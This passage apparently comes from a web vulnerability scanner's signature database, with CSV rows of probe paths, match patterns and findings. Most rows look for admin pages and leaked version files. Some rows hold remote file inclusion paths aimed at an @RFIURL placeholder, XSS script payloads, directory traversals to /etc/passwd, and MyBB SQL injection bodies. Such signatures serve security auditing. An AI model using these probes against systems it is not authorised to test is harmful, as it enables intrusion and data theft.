"006172","https://gist.github.com/mubix/5d269c686584875015a2","c","/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL&2093085906=1&995617320=2","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006173","https://gist.github.com/mubix/5d269c686584875015a2","c","/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL?&2093085906=1&995617320=2","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006174","https://gist.github.com/mubix/5d269c686584875015a2","c","/xt_counter.php?server_base_dir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006175","https://gist.github.com/mubix/5d269c686584875015a2","c","/yabbse/Sources/Packages.php?sourcedir=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006176","https://gist.github.com/mubix/5d269c686584875015a2","c","/yacs/scripts/update_trailer.php?context[path_to_root]=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006177","https://gist.github.com/mubix/5d269c686584875015a2","c","/yrch/plugins/metasearch/plug.inc.php?path=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006178","https://gist.github.com/mubix/5d269c686584875015a2","c","/ytb/cuenta/cuerpo.php?base_archivo=@RFIURL","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006179","https://gist.github.com/mubix/5d269c686584875015a2","c","/zipndownload.php?PP_PATH=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006180","https://gist.github.com/mubix/5d269c686584875015a2","c","/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=@RFIURL?","GET","PHP Version","","","","","Remote File Inclusion (RFI) from RSnake's RFI list.","","" "006181","","3","@WORDPRESSwp-content/plugins/akismet/readme.txt","GET","Tested up to","","","","","The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version","","" "006182","CVE-2005-4463","3","@WORDPRESSwp-content/plugins/hello.php","GET","Call to undefined function add_action\(\) in","","","","","The WordPress hello.php plugin reveals a file system path","","" "006183","","3","@WORDPRESSreadme.html","GET","Version","","5-minute install","","","This WordPress file reveals the installed version.","","" "006184","","3","@WORDPRESSwp-links-opml.php","GET","generator=\"WordPress\/","","","","","This WordPress script reveals the installed version.","","" "006185","","1","/includes/sendmail.inc","GET","200","","<\?php","","","Include files (.inc) should not be served in plain text.","","" "006186","","1b","/license.txt","GET","200","","","","","License file found may identify site software.","","" "006187","","1b","/install.txt","GET","200","","","","","Install file found may identify site software.","","" "006188","","1b","/LICENSE.TXT","GET","200","","","","","License file found may identify site software.","","" "006189","","1b","/INSTALL.TXT","GET","200","","","","","Install file found may identify site software.","","" "006190","","1b","/READ_THIS_FIRST.txt","GET","Welcome to ExpressionEngine","","","","","An ExpressionEngine readme file has been found.","","" "006191","","3","@WORDPRESSwp-app.log","GET","Array","LANG","","GOOG_FIXURL_LANG","","Wordpress' wp-app.log may leak application/system details.","","" "006192","","3","/_vti_bin/_vti_adm/admin.dll","GET","osstatus=","","","specified module could not be found","","FrontPage/SharePoint file found.","","" "006193","CVE-2005-4148","3","/read/rss?forum=nonexistent&rev=0.92","GET","no such element in array","","","","","Lyris ListManager error information disclosure.","","" "006194","https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf","3","/subscribe/survey~1.tml","GET","Database error inf","","","","","Lyris ListManager error information disclosure.","","" "006195","https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf","4","/scripts/message/message_dialog.tml?how_many_back=\"><script>alert(1)</script>","GET","<script>alert\(1\)<\/script>","","","","","Lyris ListManager Cross-Site Scripting.","","" "006196","https://www.procheckup.com/media/zjkb3pmc/new-listmanager-paper-v2.pdf","04","/read/attach_file.tml?page=http://cirt.net/","GET","action=\"http:\/\/cirt\.net","","","","","Lyris ListManager XSRF.","","" "006197","","23","/config/config.txt","GET","200","","","","","Configuration file found.","","" "006198","","23","/htaccess.txt","GET","RewriteEngine On","","","","","Default Joomla! htaccess.txt file found. This should be removed or renamed.","","" "006199","","1b","@TYPO3typo3/","GET","c-password","TYPO3\sScript\sID","200","","","TYPO3 login found","","" "006200","","12","@CGIDIRSphp.ini","GET","\[PHP\]","","","","","php.ini file found","","" "006201","","3","/ConversionReport.txt","GET","This report shows","","","","","A report file from an ASP.NET 1.1 conversion to an ASP.NET 2.0 project was found and may reveal sensitive information.","","" "006202","","b","/cadence/","GET","Cadre Technologies","","","","","Cadre Technologies Cadence WebAccess was found.","","" "006204","","3","/cadence/webaccess.net","GET","Failed connection","","","","","Cadre Technologies Cadence WebAccess may reveal a database name due to it being offline or misconfigured.","","" "006205","","2","/config/readme.txt","GET","200","","","","","Readme file found.","","" "006206","","2","/data/readme.txt","GET","200","","","","","Readme file found.","","" "006207","","2","/log/readme.txt","GET","200","","","","","Readme file found.","","" "006208","","2","/logs/readme.txt","GET","200","","","","","Readme file found.","","" "006209","","2","/uploads/readme.txt","GET","200","","","","","Readme file found.","","" "006210","","b","/cadence/help/help.htm","GET","Cadre Technologies","","","","","Cadre Technologies Cadence WebAccess help files found.","","" "006211","","b","/","GET","img src=\"welcome\.png\" alt=\"IIS7\"","","","","","Appears to be a default IIS 7 install.","","" "006212","","3","/install/install.aspx","GET","dtsoftware\ Configuration","","","","","dtsoftware 404 page reveals detailed application information.","","" "006213","","23","/webresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate\.","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","","" "006214","","23","/scriptresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate\.","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","","" "006215","","1","/admin1.php","GET","200","","","","","Admin login page found.","","" "006217","","1","/admin.asp","GET","200","","","","","Admin login page/section found.","","" "006218","","1","/admin/account.asp","GET","200","","","","","Admin login page/section found.","","" "006219","","1","/admin/account.html","GET","200","","","","","Admin login page/section found.","","" "006220","","1","/admin/account.php","GET","200","","","","","Admin login page/section found.","","" "006221","","1","/admin/controlpanel.asp","GET","200","","","","","Admin login page/section found.","","" "006222","","1","/admin/controlpanel.html","GET","200","","","","","Admin login page/section found.","","" "006223","","1","/admin/controlpanel.php","GET","200","","","","","Admin login page/section found.","","" "006224","","1","/admin/cp.asp","GET","200","","","","","Admin login page/section found.","","" "006225","","1","/admin/cp.html","GET","200","","","","","Admin login page/section found.","","" "006226","","1","/admin/cp.php","GET","200","","","","","Admin login page/section found.","","" "006227","","1","/admin/home.asp","GET","200","","","","","Admin login page/section found.","","" "006228","","1","/admin/home.php","GET","200","","","","","Admin login page/section found.","","" "006229","","1","/admin/index.asp","GET","200","","","","","Admin login page/section found.","","" "006230","","1","/admin/index.html","GET","200","","","","","Admin login page/section found.","","" "006231","","1","/admin/login.asp","GET","200","","","","","Admin login page/section found.","","" "006232","","1","/admin/login.html","GET","200","","","","","Admin login page/section found.","","" "006233","","1","/admin/login.php","GET","200","","","","","Admin login page/section found.","","" "006234","","1","/admin1.asp","GET","200","","","","","Admin login page/section found.","","" "006235","","1","/admin1.html","GET","200","","","","","Admin login page/section found.","","" "006236","","1","/admin1/","GET","200","","","","","Admin login page/section found.","","" "006237","","1","/admin2.asp","GET","200","","","","","Admin login page/section found.","","" "006238","","1","/admin2.html","GET","200","","","","","Admin login page/section found.","","" "006239","","1","/admin2.php","GET","200","","","","","Admin login page/section found.","","" "006240","","1","/admin4_account/","GET","200","","","","","Admin login page/section found.","","" "006241","","1","/admin4_colon/","GET","200","","","","","Admin login page/section found.","","" "006242","","1","/admincontrol.asp","GET","200","","","","","Admin login page/section found.","","" "006243","","1","/admincontrol.html","GET","200","","","","","Admin login page/section found.","","" "006244","","1","/admincontrol.php","GET","200","","","","","Admin login page/section found.","","" "006245","","1","/administer/","GET","200","","","","","Admin login page/section found.","","" "006246","","1","/administr8.asp","GET","200","","","","","Admin login page/section found.","","" "006247","","1","/administr8.html","GET","200","","","","","Admin login page/section found.","","" "006248","","1","/administr8.php","GET","200","","","","","Admin login page/section found.","","" "006249","","1","/administr8/","GET","200","","","","","Admin login page/section found.","","" "006250","","1","/administracao.php","GET","200","","","","","Admin login page/section found.","","" "006251","","1","/administraçao.php","GET","200","","","","","Admin login page/section found.","","" "006252","","1","/administracao/","GET","200","","","","","Admin login page/section found.","","" "006253","","1","/administraçao/","GET","200","","","","","Admin login page/section found.","","" "006254","","1","/administracion.php","GET","200","","","","","Admin login page/section found.","","" "006255","","1","/administracion/","GET","200","","","","","Admin login page/section found.","","" "006256","","1","/administrateur.php","GET","200","","","","","Admin login page/section found.","","" "006257","","1","/administrateur/","GET","200","","","","","Admin login page/section found.","","" "006258","","1","/administratie/","GET","200","","","","","Admin login page/section found.","","" "006259","","1","/administration.html","GET","200","","","","","Admin login page/section found.","","" "006260","","1","/administration.php","GET","200","","","","","Admin login page/section found.","","" "006261","","1","/administration/","GET","200","","","","","Admin login page/section found.","","" "006262","","1","/administrator.asp","GET","200","","","","","Admin login page/section found.","","" "006263","","1","/administrator.html","GET","200","","","","","Admin login page/section found.","","" "006264","","1","/administrator.php","GET","200","","","","","Admin login page/section found.","","" "006265","","1","/administrator/account.asp","GET","200","","","","","Admin login page/section found.","","" "006266","","1","/administrator/account.html","GET","200","","","","","Admin login page/section found.","","" "006267","","1","/administrator/account.php","GET","200","","","","","Admin login page/section found.","","" "006268","","1","/administrator/index.asp","GET","200","","","","","Admin login page/section found.","","" "006269","","1","/administrator/index.html","GET","200","","","","","Admin login page/section found.","","" "006270","","1","/administrator/index.php","GET","200","","","","","Admin login page/section found.","","" "006271","","1","/administrator/login.asp","GET","200","","","","","Admin login page/section found.","","" "006272","","1","/administrator/login.html","GET","200","","","","","Admin login page/section found.","","" "006273","","1","/administrator/login.php","GET","200","","","","","Admin login page/section found.","","" "006274","","1","/administratoraccounts/","GET","200","","","","","Admin login page/section found.","","" "006275","","1","/administrators/","GET","200","","","","","Admin login page/section found.","","" "006276","","1","/administrivia/","GET","200","","","","","Admin login page/section found.","","" "006277","","1","/adminisztrátora.php","GET","200","","","","","Admin login page/section found.","","" "006278","","1","/adminisztrátora/","GET","200","","","","","Admin login page/section found.","","" "006279","","1","/adminpanel.asp","GET","200","","","","","Admin login page/section found.","","" "006280","","1","/adminpanel.html","GET","200","","","","","Admin login page/section found.","","" "006281","","1","/adminpanel.php","GET","200","","","","","Admin login page/section found.","","" "006282","","1","/adminpro/","GET","200","","","","","Admin login page/section found.","","" "006283","","1","/admins.asp","GET","200","","","","","Admin login page/section found.","","" "006284","","1","/admins.html","GET","200","","","","","Admin login page/section found.","","" "006285","","1","/admins.php","GET","200","","","","","Admin login page/section found.","","" "006286","","1","/admins/","GET","200","","","","","Admin login page/section found.","","" "006287","","1","/AdminTools/","GET","200","","","","","Admin login page/section found.","","" "006288","","1","/amministratore.php","GET","200","","","","","Admin login page/section found.","","" "006289","","1","/amministratore/","GET","200","","","","","Admin login page/section found.","","" "006290","","1","/autologin/","GET","200","","","","","Admin login page/section found.","","" "006291","","1","/banneradmin/","GET","200","","","","","Admin login page/section found.","","" "006292","","1","/bbadmin/","GET","200","","","","","Admin login page/section found.","","" "006293","","1","/beheerder.php","GET","200","","","","","Admin login page/section found.","","" "006294","","1","/beheerder/","GET","200","","","","","Admin login page/section found.","","" "006295","","1","/bigadmin/","GET","200","","","","","Admin login page/section found.","","" "006296","","1","/blogindex/","GET","200","","","","","Admin login page/section found.","","" "006297","","1","/cadmins/","GET","200","","","","","Admin login page/section found.","","" "006298","","1","/ccms/","GET","200","","","","","Admin login page/section found.","","" "006299","","1","/ccms/index.php","GET","200","","","","","Admin login page/section found.","","" "006300","","1","/ccms/login.php","GET","200","","","","","Admin login page/section found.","","" "006301","","1","/ccp14admin/","GET","200","","","","","Admin login page/section found.","","" "006302","","1","/cmsadmin/","GET","200","","","","","Admin login page/section found.","","" "006303","","1","/configuration/","GET","200","","","","","Admin login page/section found.","","" "006304","","1","/configure/","GET","200","","","","","Admin login page/section found.","","" "006305","","1","/controlpanel.asp","GET","200","","","","","Admin login page/section found.","","" "006306","","1","/controlpanel.html","GET","200","","","","","Admin login page/section found.","","" "006307","","1","/controlpanel.php","GET","200","","","","","Admin login page/section found.","","" "006308","","1","/controlpanel/","GET","200","","","","","Admin login page/section found.","","" "006309","","1","/cp.asp","GET","200","","","","","Admin login page/section found.","","" "006310","","1","/cp.html","GET","200","","","","","Admin login page/section found.","","" "006311","","1","/cp.php","GET","200","","","","","Admin login page/section found.","","" "006312","","1","/cpanel_file/","GET","200","","","","","Admin login page/section found.","","" "006313","","1","/customer_login/","GET","200","","","","","Admin login page/section found.","","" "006314","","1","/database_administration/","GET","200","","","","","Admin login page/section found.","","" "006315","","1","/Database_Administration/","GET","200","","","","","Admin login page/section found.","","" "006316","","1","/dir-login/","GET","200","","","","","Admin login page/section found.","","" "006317","","1","/directadmin/","GET","200","","","","","Admin login page/section found.","","" "006318","","1","/ezsqliteadmin/","GET","200","","","","","Admin login page/section found.","","" "006319","","1","/fileadmin.asp","GET","200","","","","","Admin login page/section found.","","" "006320","","1","/fileadmin.html","GET","200","","","","","Admin login page/section found.","","" "006321","","1","/fileadmin.php","GET","200","","","","","Admin login page/section found.","","" "006322","","1","/formslogin/","GET","200","","","","","Admin login page/section found.","","" "006323","","1","/globes_admin/","GET","200","","","","","Admin login page/section found.","","" "006324","","1","/hpwebjetadmin/","GET","200","","","","","Admin login page/section found.","","" "006325","","1","/Indy_admin/","GET","200","","","","","Admin login page/section found.","","" "006326","","1","/irc-macadmin/","GET","200","","","","","Admin login page/section found.","","" "006327","","1","/LiveUser_Admin/","GET","200","","","","","Admin login page/section found.","","" "006328","","1","/login_db/","GET","200","","","","","Admin login page/section found.","","" "006329","","1","/login-redirect/","GET","200","","","","","Admin login page/section found.","","" "006330","","1","/login-us/","GET","200","","","","","Admin login page/section found.","","" "006331","","1","/login.asp","GET","200","","","","","Admin login page/section found.","","" "006332","","1","/login.html","GET","200","","","","","Admin login page/section found.","","" "006333","","1","/login.php","GET","200","","","","","Admin login page/section found.","","" "006334","","1","/login1/","GET","200","","","","","Admin login page/section found.","","" "006335","","1","/loginflat/","GET","200","","","","","Admin login page/section found.","","" "006336","","1","/logo_sysadmin/","GET","200","","","","","Admin login page/section found.","","" "006337","","1","/Lotus_Domino_Admin/","GET","200","","","","","Admin login page/section found.","","" "006338","","1","/macadmin/","GET","200","","","","","Admin login page/section found.","","" "006339","","1","/maintenance/","GET","200","","","","","Admin login page/section found.","","" "006340","","1","/manuallogin/","GET","200","","","","","Admin login page/section found.","","" "006341","","1","/memlogin/","GET","200","","","","","Admin login page/section found.","","" "006342","","1","/meta_login/","GET","200","","","","","Admin login page/section found.","","" "006343","","1","/modelsearch/login.asp","GET","200","","","","","Admin login page/section found.","","" "006344","","1","/modelsearch/login.php","GET","200","","","","","Admin login page/section found.","","" "006345","","1","/moderator.asp","GET","200","","","","","Admin login page/section found.","","" "006346","","1","/moderator.html","GET","200","","","","","Admin login page/section found.","","" "006347","","1","/moderator.php","GET","200","","","","","Admin login page/section found.","","" "006348","","1","/moderator/","GET","200","","","","","Admin login page/section found.","","" "006349","","1","/moderator/admin.asp","GET","200","","","","","Admin login page/section found.","","" "006350","","1","/moderator/admin.html","GET","200","","","","","Admin login page/section found.","","" "006351","","1","/moderator/admin.php","GET","200","","","","","Admin login page/section found.","","" "006352","","1","/moderator/login.asp","GET","200","","","","","Admin login page/section found.","","" "006353","","1","/moderator/login.html","GET","200","","","","","Admin login page/section found.","","" "006354","","1","/moderator/login.php","GET","200","","","","","Admin login page/section found.","","" "006355","","1","/myadmin/","GET","200","","","","","Admin login page/section found.","","" "006356","","1","/navSiteAdmin/","GET","200","","","","","Admin login page/section found.","","" "006357","","1","/newsadmin/","GET","200","","","","","Admin login page/section found.","","" "006358","","1","/openvpnadmin/","GET","200","","","","","Admin login page/section found.","","" "006359","","1","/painel/","GET","200","","","","","Admin login page/section found.","","" "006360","","1","/panel/","GET","200","","","","","Admin login page/section found.","","" "006361","","1","/pgadmin/","GET","200","","","","","Admin login page/section found.","","" "006362","","1","/phpldapadmin/","GET","200","","","","","Admin login page/section found.","","" "006363","","1","/phppgadmin/","GET","200","","","","","Admin login page/section found.","","" "006364","","1","/phpSQLiteAdmin/","GET","200","","","","","Admin login page/section found.","","" "006365","","1","/platz_login/","GET","200","","","","","Admin login page/section found.","","" "006366","","1","/power_user/","GET","200","","","","","Admin login page/section found.","","" "006367","","1","/project-admins/","GET","200","","","","","Admin login page/section found.","","" "006368","","1","/pureadmin/","GET","200","","","","","Admin login page/section found.","","" "006369","","1","/radmind-1/","GET","200","","","","","Admin login page/section found.","","" "006370","","1","/radmind/","GET","200","","","","","Admin login page/section found.","","" "006371","","1","/rcLogin/","GET","200","","","","","Admin login page/section found.","","" "006372","","1","/server_admin_small/","GET","200","","","","","Admin login page/section found.","","" "006373","","1","/Server.asp","GET","200","","","","","Admin login page/section found.","","" "006374","","1","/Server.html","GET","200","","","","","Admin login page/section found.","","" "006375","","1","/Server.php","GET","200","","","","","Admin login page/section found.","","" "006376","","1","/ServerAdministrator/","GET","200","","","","","Admin login page/section found.","","" "006377","","1","/showlogin/","GET","200","","","","","Admin login page/section found.","","" "006378","","1","/simpleLogin/","GET","200","","","","","Admin login page/section found.","","" "006379","","1","/smblogin/","GET","200","","","","","Admin login page/section found.","","" "006380","","1","/sql-admin/","GET","200","","","","","Admin login page/section found.","","" "006381","","1","/ss_vms_admin_sm/","GET","200","","","","","Admin login page/section found.","","" "006382","","1","/sshadmin/","GET","200","","","","","Admin login page/section found.","","" "006383","","1","/staradmin/","GET","200","","","","","Admin login page/section found.","","" "006384","","1","/sub-login/","GET","200","","","","","Admin login page/section found.","","" "006385","","1","/Super-Admin/","GET","200","","","","","Admin login page/section found.","","" "006386","","1","/support_login/","GET","200","","","","","Admin login page/section found.","","" "006387","","1","/sys-admin/","GET","200","","","","","Admin login page/section found.","","" "006388","","1","/sysadmin.asp","GET","200","","","","","Admin login page/section found.","","" "006389","","1","/sysadmin.html","GET","200","","","","","Admin login page/section found.","","" "006390","","1","/sysadmin.php","GET","200","","","","","Admin login page/section found.","","" "006391","","1","/sysadmin/","GET","200","","","","","Admin login page/section found.","","" "006392","","1","/SysAdmin/","GET","200","","","","","Admin login page/section found.","","" "006393","","1","/SysAdmin2/","GET","200","","","","","Admin login page/section found.","","" "006394","","1","/sysadmins/","GET","200","","","","","Admin login page/section found.","","" "006395","","1","/system_administration/","GET","200","","","","","Admin login page/section found.","","" "006396","","1","/system-administration/","GET","200","","","","","Admin login page/section found.","","" "006398","","1","/ur-admin.asp","GET","200","","","","","Admin login page/section found.","","" "006399","","1","/ur-admin.html","GET","200","","","","","Admin login page/section found.","","" "006400","","1","/ur-admin.php","GET","200","","","","","Admin login page/section found.","","" "006401","","1","/ur-admin/","GET","200","","","","","Admin login page/section found.","","" "006402","","1","/useradmin/","GET","200","","","","","Admin login page/section found.","","" "006403","","1","/UserLogin/","GET","200","","","","","Admin login page/section found.","","" "006404","","1","/utility_login/","GET","200","","","","","Admin login page/section found.","","" "006405","","1","/v2/painel/","GET","200","","","","","Admin login page/section found.","","" "006406","","1","/vadmind/","GET","200","","","","","Admin login page/section found.","","" "006407","","1","/vmailadmin/","GET","200","","","","","Admin login page/section found.","","" "006408","","1","/webadmin.asp","GET","200","","","","","Admin login page/section found.","","" "006409","","1","/webadmin.html","GET","200","","","","","Admin login page/section found.","","" "006410","","1","/webadmin.php","GET","200","","","","","Admin login page/section found.","","" "006411","","1","/webmaster/","GET","200","","","","","Admin login page/section found.","","" "006412","","1","/websvn/","GET","200","","","","","Admin login page/section found.","","" "006413","","1","/wizmysqladmin/","GET","200","","","","","Admin login page/section found.","","" "006414","","1","@WORDPRESSwp-admin/","GET","200","","","","","Admin login page/section found.","","" "006415","","1","@WORDPRESSwp-login/","GET","200","","","","","Admin login page/section found.","","" "006416","","1","/xlogin/","GET","200","","","","","Admin login page/section found.","","" "006417","","1","/yonetici.asp","GET","200","","","","","Admin login page/section found.","","" "006418","","1","/yonetici.html","GET","200","","","","","Admin login page/section found.","","" "006419","","1","/yonetici.php","GET","200","","","","","Admin login page/section found.","","" "006420","","1","/yonetim.asp","GET","200","","","","","Admin login page/section found.","","" "006421","","1","/yonetim.html","GET","200","","","","","Admin login page/section found.","","" "006422","","1","/yonetim.php","GET","200","","","","","Admin login page/section found.","","" "006423","","1","/test.asp","GET","200","","","","","This might be interesting.","","" "006424","","1","/test.aspx","GET","200","","","","","This might be interesting.","","" "006425","","1","/test.php","GET","200","","","","","This might be interesting.","","" "006426","","1","/maintenance.asp","GET","200","","","","","This might be interesting.","","" "006427","","1","/maintenance.aspx","GET","200","","","","","This might be interesting.","","" "006429","","1","/maint/","GET","200","","","","","This might be interesting.","","" "006430","","1","/maint.asp","GET","200","","","","","This might be interesting.","","" "006431","","1","/maint.aspx","GET","200","","","","","This might be interesting.","","" "006432","CVE-2009-3733","57","/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml","GET","200","","","","","VMWare ESX is vulnerable to a directory traversal attack.","","" "006433","CVE-2007-6203","4","/","<script>alert(1)</script>","413","","<script>alert\(1\)<\/script>","","","Apache HTTP Server 2.0.x and 2.2.x contain an XSS when JavaScript is used as the method","","Content-Length: -1" "006434","","3","/jk-status","GET","200","","","","","mod_jk status page is visible.","","" "006435","","3","/balancer-manager","GET","200","","","","","mod_proxy_balancer management page is visible.","","" "006437","","1","/servlets-examples/","GET","200","","","","","Tomcat servlets examples are visible.","","" "006438","","1e","/admin-console","GET","200","","","","","JBoss admin console is visible.","","" "006439","","13","/webmail/src/configtest.php","GET","SquirrelMail configtest","","","","","Squirrelmail configuration test may reveal version and system info.","","" "006440","","23","@CGIDIRSawstats.pl","GET","SiteDomain parameter","","","","","AWStats logfile analyzer is misconfigured.","","" "006441","","2","@CGIDIRSawredir.pl","GET","200","","","","","AWStats redirection file.","","" "006442","","1","/help.php","GET","200","","","","","A help file was found.","","" "006443","","b","@WORDPRESS","GET","\/wp-content\/","","","","","A Wordpress installation was found.","","" "006445","http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","3","@VBULLETINfaq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database<\/span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search.","","" "006447","","2b","/wconnect/admin.html","GET","e-SPS Web","","","","","American Software e-SPS admin section found.","","" "006448","","18","/open.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","","" "006449","","18","/fx29id1.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","","" "006450","","18","/fx29id2.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","","" "006451","","b","/gif/hp_invent_logo.gif","GET","200","","","","","This device may be an HP printer/scanner and allow retrieval of previously scanned images.","","" "006452","","b","/gif/tricolor_ink_guage.gif","GET","200","","","","","This device may be an HP printer/scanner and allow retrieval of previously scanned images.","","" "006453","","b1","/logon/logonServlet","GET","User Management","","","","","SAP NetWeaver admin interface found.","","" "006454","","3","/AdobeDocumentServicesSec/Config/bindings?wsdl&style=http","GET","><b>\ \ The file:","","does not exist","","","SAP J2EE server reveals the disk path with certain invalid requests.","","" "006455","http://ws.apache.org/axis/java/security.html","23","@AXIS2services","GET","And now\.\.\.\sSome\sServices","","","","","Apache Axis web services reveals information about all installed web services.","","" "006456","http://ws.apache.org/axis/java/security.html","23","@AXIS2happyaxis.jsp","GET","Examining\swebapp\sconfiguration","<title>Axis\sHappiness\sPage<\/title>","","","","Apache Axis file reveals sensitive information about the Axis installation components.","","" "006457","","2","/apidocs/index.html","GET","designed to be viewed using the frames","","","","","SAP J2EE Engine help.","","" "006458","","2","/bcb/bcbadmStart.jsp","GET","BCB-Administration","","","","","SAP Business Communication Broker (bcb) may reveal system information and allow configuration.","","" "006459","","23","/GRMGHeartBeat/HTTPGRMGTest.html","GET","This is test page for GRMG","","","","","SAP GRMG test page.","","" "006460","","23","/meSync/HttpGRMGTest.html","GET","This is test page for GRMG","","","","","SAP GRMG test page.","","" "006461","","23","/htmlb/index.html","GET","HTMLB for Java","","","","","SAP HTMLB pages.","","" "006462","","23","/SQLTrace/index.html","GET","Welcome to SQLTrace","","","","","SAP SQLTrace may disclose sensitive information.","","" "006463","","23","/TestJDBC_Web/TestJDBCPage.jsp","GET","Please select a connection","","","","","SAP Test JDBC Page may allow unauthorized access to resources or provide detailed errors.","","" "006464","","23","/uddiclient/jsps/index.jsp","GET","HTML Business for Java","","","","","SAP UDDI Tool is available remotely.","","" "006465","","b12","/~/index.html","GET","SAP NetWeaver","","","","","SAP NetWeaver default page links to other admin areas.","","" "006466","","b12","/webdynpro/welcome/Welcome.jsp","GET","Web Dynpro Welcome","","","","","SAP NetWeaver Web Dynpro Tool Applications.","","" "006467","","b","/sites/","GET","Plone are now up and running","","","","","Zope/Plone were found. Try adding a new site!.","","" "006468","","0","@FCKEDITOReditor/filemanager/browser/default/frmupload.html","GET","Upload a new file","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006469","","23","@FCKEDITORlicense.txt","GET","Frederico","","","","","FCKeditor license file found.","","" "006470","","1","@FCKEDITORfckconfig.js","GET","FCKConfig","","","","","FCKeditor JavaScript file found.","","" "006471","","23","@FCKEDITOR_whatsnew.html","GET","CreateFCKeditor","FCKeditor\sChangeLog","","","","FCKeditor changes file found.","","" "006472","","0","@FCKEDITOReditor/filemanager/browser/default/browser.html","GET","Resources Browser","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006473","","1b","/reportserver/","GET","Microsoft SQL Server Reporting Services","","","","","Microsoft SQL Server Reporting Services","","" "006474","","2","/j2ee/examples/servlets/","GET","This is a collection","","","","","Oracle j2ee example servlets.","","" "006475","","2","/j2ee/examples/jsp/","GET","This is a collection","","","","","Oracle j2ee example JSP pages.","","" "006476","","1","/messages/","GET","200","","","","","This might be interesting.","","" "006477","http://tinyurl.com/2f4r2o9","23","@CRYSTALREPORTSviewrpt.cwr?id=1&wid=1&apstoken=127.0.0.2:0@111","GET","Server 127\.0\.0\.2:0 not found","","","","","Crystal Reports can be used to scan internal hosts.","","" "006478","","be","/console-selfservice/","GET","console header","","","","","RSA Self-Service Console found","","" "006479","","3","@AXIS2axis2-web/HappyAxis.jsp","GET","Axis2\sHappiness\sPage","Back\sHome","","","","Apache Axis2 Happiness Page identified which includes internal application details.","","" "006480","http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue\.","","","Sorry, but no results were returned","","MyBB 1.6 contains an SQL Injection in the keywords parameter of search.php.","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1","" "006481","http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue\.","","","Sorry, but no results were returned","","MyBBx 1.6 contains an SQL Injection in the keywords parameter of private.php.","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff","" "006482","","3","/en-GB/debug/sso","GET","SSO Enabled","","","","","Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.","","" "006483","","3","/en-US/debug/sso","GET","SSO Enabled","","","","","Splunk's SSO debug may reveal sensitive info, such as internal IPs/hostnames.","","" "006484","","3","/default.htm","GET","Behind Every Great Web Site","","","","","Default EPiServer file found","","" "006486","https://issues.apache.org/jira/browse/AXIS2-4279,https://www.exploit-db.com/exploits/12721","7","@AXIS2services/Version?xsd=../../../../../../../../../../../etc/passwd","GET","root:","","","","","Apache Axis2 contains a directory traversal in the Version program.","","" "006487","","b","/Util/login.aspx","GET","EPiServer CMS","epi\-(login|button)","","","","EPiServer admin login page found.","","" "006488","","b","@PHPMYADMINsetup","GET","index\.php\?phpMyAdmin=","","","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts. The /setup/ directory may reveal details about the install application and databases.","","" "006489","","1","/jsp/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","JSP directory has indexing enabled.","","" "006490","","be","/portal/console/","GET","function\sfindTopWindow","","","","","Vignette Server admin console located.","","" "006491","","2abe","/network/cgi/network.cgi","GET","Network\sConfiguration","","","","","IndigoVision web console access found without authentication.","","" "006492","","b","/sitefinity/Login.aspx","GET","checkForIframe","","","","","Telerik Sitefinity CMS login found.","","" "006493","","1","/cms/","GET","200","","","","","This might be interesting.","","" "006494","","1","/helpdesk/","GET","200","","","","","This might be interesting.","","" "006495","","1b","@PHPMYADMIN","GET","200","401","","","","phpMyAdmin directory found","","" "006496","","3b","/admin/install/phpinfo.php","GET","PHP Version","","","","","LimeSurvey phpinfo page found. The install directory may contain resetadminpw.php, which will set admin to the default password, likely 'password'. The install directory should be removed.","","" "006497","","b","/portal/binary/junk/","GET","Attempt\smade\s\to\sload\sunavailable\sclass","","","","","Vignette Server binary loader.","","" "006498","","bd","/portal/webservice/","GET","And\snow\.\.\.","","","","","Vignette Server webservices.","","" "006499","","be","/console/login/LoginForm.jsp","GET","Log\sin\sto\swork","","","","","Oracle WebLogic administrator login found.","","" "006500","","b3","/home/?vhelp","GET","Global\sAvailable\sMacros","","","","","Intuit 